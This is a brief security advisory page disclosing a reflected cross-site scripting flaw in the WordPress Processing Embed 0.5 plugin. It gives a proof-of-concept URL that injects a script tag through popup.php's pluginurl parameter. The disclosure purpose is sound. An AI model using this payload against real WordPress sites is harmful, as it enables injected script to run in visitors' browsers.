Home
Consulting
Advisories
Software
Articles
Contact

WordPress Processing Embed 0.5 Reflected Cross-site Scripting

Legacy Advisories

Description

A reflected cross-site scripting vulnerability in WordPress Processing Embed 0.5 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/wordpress/wp-content/plugins/wordpress-processing-embed/data/popup.php?pluginurl=%3Cscript%3Ealert(0)%3C/script%3E


Copyright © 2018 AutoSec Tools LLC